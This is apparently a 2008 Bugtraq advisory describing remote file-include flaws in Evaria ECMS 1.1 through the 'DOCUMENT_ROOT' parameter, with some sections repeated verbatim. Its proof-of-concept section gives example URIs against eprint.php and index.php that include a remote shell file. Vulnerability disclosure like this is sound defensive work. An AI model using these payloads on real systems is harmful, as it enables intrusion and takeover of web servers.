Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
BID:30262
Info
Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 30262 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 16 2008 12:00AM |
| Updated: | Jul 17 2008 09:48PM |
| Credit: | ahmadbady |
| Vulnerable: |
Evaria ECMS 1.1 |
| Not Vulnerable: | |
Discussion
Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
ECMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ECMS 1.1 is vulnerable; other versions may also be affected.
ECMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ECMS 1.1 is vulnerable; other versions may also be affected.
Exploit / POC
Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt?
http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt?
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt?
http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt?
Solution / Fix
Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Evaria ECMS 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- Evaria Homepage (Evaria)